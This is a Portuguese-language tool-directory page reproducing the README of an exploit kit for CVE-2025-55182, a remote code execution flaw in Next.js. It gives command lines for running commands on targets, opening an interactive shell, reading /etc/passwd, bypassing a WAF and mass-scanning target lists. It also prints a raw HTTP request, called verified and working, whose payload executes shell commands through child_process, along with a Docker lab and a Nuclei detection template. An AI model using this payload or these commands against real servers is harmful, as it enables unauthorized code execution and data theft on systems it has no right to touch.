Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react2shell-exploit — React2Shell-Exploit — Framework de exploração completo para CVE-2025-55182, incluindo exploit em Python, laboratório vulnerável em Docker, exploração manual e automatizada com Burp Suite, template de detecção para Nuclei e fluxo de teste validado. Desenvolvido para testes de penetração e pesquisa educacional. | Kitploit
Ferramentas/GitHubGitHub/rubensuxo-eh/react2shell-exploit
Scanners de VulnerabilidadesFrameworks de ExploraçãoExploração de Aplicações WebBypass de WAFTestes de PenetraçãoComando e ControleAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática
GitHubrubensuxo-eh/react2shell-exploit

react2shell-exploit

Ver Repositório
414há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

React2Shell-Exploit — Framework de exploração completo para CVE-2025-55182, incluindo exploit em Python, laboratório vulnerável em Docker, exploração manual e automatizada com Burp Suite, template de detecção para Nuclei e fluxo de teste validado. Desenvolvido para testes de penetração e pesquisa educacional.

Compartilhar

🐺 React2Shell-Exploit-Kensei

CVE-2025-55182 - Next.js RCE - Execução Remota de Código

Framework de exploração + laboratório vulnerável + validação com Burp Suite e Nuclei.

Framework de exploração completo e ambiente de laboratório vulnerável para pesquisa de segurança e testes de penetração.

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║              🐺 React2Shell-Exploit-Kensei 🐺                 ║
║              CVE-2025-55182 Exploitation Tool                 ║
║                                                               ║
║  Author: Ruben Suxo - Ethical Hacker (kensei)    v2.5.0      ║
╚═══════════════════════════════════════════════════════════════╝

🎯 Visão Geral

React2Shell-Exploit-Kensei é um kit de ferramentas abrangente para explorar o CVE-2025-55182, uma vulnerabilidade crítica de execução remota de código em aplicações Next.js.

Inclui:

  • 🐍 Exploit em Python (modos automático e manual)
  • 🐳 Laboratório vulnerável Docker (Next.js 16.0.6)
  • 🔥 Templates de exploração para Burp Suite
  • 🚨 Template de detecção Nuclei
  • 🧪 Casos de teste validados

Versões Afetadas:

  • Next.js < 16.0.7
  • React 19.0.0

Pontuação CVSS: 10.0 (Crítico)

✨ Funcionalidades

🔨 Exploração

✅ Exploração Automatizada
✅ Shell Interativo
✅ Execução de Comandos
✅ Leitura de Arquivos
✅ Bypass de WAF
✅ Varredura em Lote

🧪 Ambiente de Laboratório Docker - Pré-requisitos

Você deve ter o Docker instalado para executar o laboratório vulnerável.

PlataformaLink de Instalação
Windowshttps://docs.docker.com/desktop/install/windows/
macOShttps://docs.docker.com/desktop/install/mac-install/
Linuxhttps://docs.docker.com/engine/install/

Verificar instalação:

root@kitploit:~
docker --version

📖 Documentação

✅ Guia do Burp Suite
✅ Template Nuclei
✅ Exemplos Completos


🚀 Início Rápido

root@kitploit:~
# 1. Clone
git clone react2shell-exploit
cd react2shell-exploit
chmod +x react2shell-exploit.py

# 2. Start Lab
cd docker
docker build --no-cache -t react2shell-lab .
docker run -d -p 3002:3002 --name react2shell-lab react2shell-lab

# 3. Exploit
python3 react2shell-exploit.py --url http://localhost:3002 --cmd "whoami"

💻 Exemplos de Uso

Varredura

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --scan

Executar Comando

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "id"

Shell Interativo

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --shell

Ler Arquivo

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --read /etc/passwd

Bypass de WAF

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "whoami" --waf-bypass

Varredura em Lote

root@kitploit:~
python3 react2shell-exploit.py --list targets.txt --scan --threads 20

🔍 Exploração Manual

Burp Suite

Modelo de Requisição Verificado e Funcionando:

root@kitploit:~
POST / HTTP/1.1
Host: target.com:3002
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
Content-Length: 734

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami',{timeout:30000}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/exploit?out=${encodeURIComponent(res)};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Resposta Esperada:

root@kitploit:~
"children":["__PAGE__?{\"out\":\"root\"}",{}]

Testando WHOAMI manualmente: Minha Captura de Tela

Testando IFCONFIG manualmente: Minha Captura de Tela

Métodos Alternativos de Detecção Automatizada:

  • ✅ Extensão Extensibility Helper:
    1. Vá em Extensões:
    2. Instale "Extensibility Helper" e vá para ele

Minha Captura de Tela

  1. Vá em "Bambda Store"
  2. Procure por "CVE-2025-55182,CVE-2025-66478 - React2Shell"

Minha Captura de Tela

  1. clique em "importar"

Minha Captura de Tela

  1. Execute uma "Auditoria de Itens Selecionados"

Minha Captura de Tela

Minha Captura de Tela

Minha Captura de Tela

  1. Valide na aba Personalizada se "CVE-2025-55182,CVE-2025-66478 - React2Shell" está marcado Minha Captura de Tela
  • ✅ ActiveScan++: Detecção automatizada

Minha Captura de Tela

Nuclei

Verificado e Funcionando:

root@kitploit:~
nuclei -target http://target.com:3002 -t nuclei/CVE-2025-55182.yaml

Saída:

root@kitploit:~
[CVE-2025-55182] [http] [critical] http://target.com:3002/

Minha Captura de Tela

🐺 Créditos

Autor: Ruben Suxo - Hacker Ético (kensei)
Versão: 2.5.0
Data: 2025-12-06

Pesquisa e Inspiração

Este projeto se baseia em pesquisas e técnicas de:

  • assetnote/react2shell-scanner - Implementação do scanner
  • freeqaz/react2shell - Técnicas de exploração
  • whiteov3rflow/CVE-2025-55182-poc - Prova de conceito

Descoberta da Vulnerabilidade

  • Lachlan Davidson (@lachlan2k) - Descoberta original do CVE-2025-55182

⚠️ Aviso Legal

Apenas para testes de segurança autorizados.

Acesso não autorizado é ilegal. Use apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar.


📄 Licença

Licença MIT


🐺 Hack The Planet - Com Responsabilidade

Apenas para fins educacionais. Use eticamente.

Baixar ferramenta